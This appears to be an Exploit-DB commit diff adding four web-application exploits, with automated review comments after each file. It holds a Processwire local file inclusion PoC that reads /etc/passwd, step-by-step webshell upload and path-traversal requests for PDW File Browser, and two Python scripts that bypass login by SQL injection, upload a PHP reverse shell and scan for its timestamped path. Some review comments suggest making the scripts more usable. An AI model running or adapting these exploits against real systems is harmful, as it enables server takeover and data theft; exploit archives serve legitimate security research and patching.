DB: 2020-11-05

5 changes to exploits/shellcodes

Processwire CMS 2.4.0 - 'download' Local File Inclusion
PDW File Browser 1.3 - Remote Code Execution
School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
Offensive Security 2020-11-05 05:01:59 +00:00
parent 302d11bcbf
commit 543f8dc781
6 changed files with 177 additions and 0 deletions

@ -0,0 +1,20 @@
# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
# Vulnerability Type: Unauthenticated LFI
# Date: [03.11.2020]
# Exploit Author: [Y1LD1R1M]
# Type: [WEBAPPS]
# Platform: [PHP]
# Vendor Homepage: [https://processwire.com/]
# Version: [2.4.0]
# Tested on: [Kali Linux]
** Description **
Local File Inclusion in Processwire CMS 2.4.0 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.
** Proof of Concept **
http://URL/index.php?download=/etc/passwd
http://URL/index.php?download=../config.php
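Review bot: the header fields still carry the template brackets (`# Date: [03.11.2020]`, `# Exploit Author: [Y1LD1R1M]`, `# Version: [2.4.0]`, `# Tested on: [Kali Linux]`), and the in-file title `[Local File Inclusion Processwire CMS 2.4.0]` does not match the title the same commit records for 48986 in files_exploits.csv ("Processwire CMS 2.4.0 - 'download' Local File Inclusion"); strip the brackets and use one title so the index and the file agree. The Description also runs two sentences together ("...via the download parameter to index.php By providing..."), and the two PoC URLs resolve against different bases (an absolute `/etc/passwd` versus a relative `../config.php`), so one sentence on which directory the `download` value is resolved from, and that the fix is to restrict it to an allowed directory after canonicalisation, would make the advisory usable for remediation rather than only for reproduction.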

@ -0,0 +1,46 @@
# Exploit Title: PDW File Browser 1.3 - Remote Code Execution
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3
Attack type
Remote
Impact
Remote Code Execution
The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a critical software vulnerability which results in remote code execution on the web server. This vulnerability can be exploited by all authenticated users.
Steps to RCE:
Upload a .txt file containing your webshell code using the default file upload functionality within the PDF file Browser. Please note that all users (including unauthenticated users) are able to access your webshell later on. For security purposes I would recommend using weevely (https://github.com/epinna/weevely3) as this obfuscated and password protects your webshell. Below I have provided how the request should look like for uploading your WEBSHELL.txt file.
POST /ckeditor/plugins/pdw_file_browser/ajax_php_uploader.php?uploadpath=%2Fmedia%2F&qqfile=WEBSHELL.txt HTTP/1.1
Host: <HOSTNAME>
[…]
<?php
<WEBSHELLCODE HERE>
?>
Once you have uploaded your webshell with a .txt extension (WEBSHELL.txt) you are able to rename the file using the rename functionality of the PDW File Browser.
Within this functionality it is possible to both change the file extension your WEBSHELL from .txt to .php and move the file to an arbitrary location on the web server . The path to the arbitrary location should contain double encoded characters.
Below I have provided an example which both renames our WEBSHELL.txt to WEBSHELL.php and relocates the file to the 'content' directory.
POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
Host: <HOSTNAME>
[…]
action=rename&new_filename=%252E%252E%252Fcontent%252FWEBSHELL.php&old_filename=WEBSHELL.txt&folder=%252Fmedia%252F&type=file
After this request your webshell should be located at https://<TARGET>/content/WEBSHELL.php
Happy Hacking :^)
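Review bot: the impact statement and the steps disagree on authentication ("This vulnerability can be exploited by all authenticated users" versus the step note that "all users (including unauthenticated users) are able to access your webshell later on"); state plainly that upload and rename need an authenticated editor session while the resulting file is reachable without one, since that distinction drives the severity. The rename step depends on `new_filename=%252E%252E%252Fcontent%252F...` being decoded a second time by `actions.php`, but the write-up never names the decoding call, the missing path normalisation that lets `..` escape the `folder` parameter, or why the upload filter accepts `.txt` while rename accepts a `.php` target; naming those root causes, and the fix (canonicalise the target path inside the upload root and re-apply the extension whitelist on rename), would turn this into an actionable advisory. Minor: `# Vendor Homepage: n/a` although the GitHub repository is the vendor, and "PDF file Browser" in the upload step should read "PDW File Browser".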

exploits/php/webapps/48988.py Executable file
@ -0,0 +1,53 @@
# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz
#!/usr/bin/python3
import requests
import time
def sqli_admin():
s = requests.Session()
data = {"username":"admin'or'1'=1#","password":"hacked"}
adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings"
s.post(adminlogin,data=data)
return s
def trigger_rce(session):
starttime = int(time.time())
multipart_form_data = {
"name": ("cyberscurity"),
"email": ("test@test.com"),
"contact" : ("+11111111111"),
"about" : ("Nothing much about it"),
"img" : ("shell.php", open("shell.php", "rb"))
}
session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
get_shell(starttime-100,starttime+100,session)
def get_shell(start,end,session):
for i in range(start,end):
session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/slms/admin/assets/uploads/"+ str(i) +"_shell.php")
if response.status_code == 200:
print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
def main():
session = sqli_admin()
trigger_rce(session)
if __name__ == '__main__':
main()
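Review bot: the `#!/usr/bin/python3` shebang sits after the comment header, so it has no effect; move it to line 1. The header says to "change [TARGET URL] to target URL or IP address", but no such placeholder exists and `http://localhost/slms/...` is hard-coded in four places; one base-URL variable (or a command-line argument) would match the instructions. In `sqli_admin` the variable `adminlogin` points at `ajax.php?action=save_settings`, the same action `trigger_rce` later posts the upload to, so either the name or the action is wrong and the login request should be checked against the application's actual login handler. `get_shell` issues two GETs per candidate timestamp and discards the first (`session.get(...)` is unused, then the unauthenticated `requests.get` is the one whose status is checked), the ±100 second window assumes the server clock is within that skew of the client, and `open("shell.php", "rb")` is never closed; use a single request and a `with` block. The parenthesised values in `multipart_form_data` such as `("cyberscurity")` are plain strings, not tuples, so the parentheses only mislead, and "cyberscurity" is misspelled.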

exploits/php/webapps/48989.py Executable file
@ -0,0 +1,53 @@
# Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz
#!/usr/bin/python3
import requests
import time
def sqli_admin():
s = requests.Session()
data = {"username":"admin'or'1'=1#","password":"mosaaed"}
adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
s.post(adminlogin,data=data)
return s
def trigger_rce(session):
starttime = int(time.time())
multipart_form_data = {
"name": ("cyberscurity"),
"email": ("test@test.com"),
"contact" : ("+11111111111"),
"about" : ("attack"),
"img" : ("shell.php", open("shell.php", "rb"))
}
session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
get_shell(starttime-100,starttime+100,session)
def get_shell(start,end,session):
for i in range(start,end):
session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php")
if response.status_code == 200:
print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
def main():
session = sqli_admin()
trigger_rce(session)
if __name__ == '__main__':
main()
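Review bot: this file is a copy of 48988.py with only the base path (`/sta/` versus `/slms/admin/`), the `about` value and the password string changed, and it carries the same defects: the shebang is not on line 1, the `[TARGET URL]` placeholder the header refers to does not exist (the URL is hard-coded to `localhost` in four places), `adminlogin` targets `action=save_settings` rather than a login action, `get_shell` fires a redundant `session.get` before the `requests.get` whose status is actually checked, and the `open("shell.php", "rb")` handle is never closed. Either factor the shared logic into one script that takes the base path as a parameter or, since the index keeps them as separate entries, fix both copies in this commit.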

@ -2,6 +2,7 @@
# Exploit Author: Nassim Asrir
# Vendor Homepage: https://www.foxitsoftware.com/
# Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog.
# CVE-2020-14425
The exploit process need the user-interaction (Opening the PDF) .
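Review bot: the added line `# CVE-2020-14425` breaks the `# Field: value` form of the surrounding header (`# Exploit Author:`, `# Vendor Homepage:`, `# Description:`); write it as `# CVE: CVE-2020-14425` so the identifier is parsed alongside the other fields. Its placement directly after the Description that names the affected versions (before 10.0) is right; while editing, the untouched sentence "The exploit process need the user-interaction (Opening the PDF) ." has a grammar and spacing issue that could be tidied in the same change.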

@ -40804,6 +40804,10 @@ id,file,description,date,author,type,platform,port
48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php,
48985,exploits/php/webapps/48985.txt,"Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php,
48986,exploits/php/webapps/48986.txt,"Processwire CMS 2.4.0 - 'download' Local File Inclusion",2020-11-04,Y1LD1R1M,webapps,php,
48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
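Review bot: the four new rows (48986 to 48989) match their files' paths and titles except that the author field `Mosaaed` for 48988/48989 is capitalised while the exploit headers use `mosaaed`, and the 48986 title here ("Processwire CMS 2.4.0 - 'download' Local File Inclusion") differs from the title inside 48986.txt (`[Local File Inclusion Processwire CMS 2.4.0]`); keep the index and the file headers in sync. The context row for 48985 carries the leaked prefix "Exploit Title: " in its description field, and the rows that follow the insertion point (42884, 42805, 42889) show the file is not id-ordered at this spot; since this hunk already touches the region, drop the prefix from 48985 and, if the CSV is meant to be id-ordered, check the placement of those rows.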
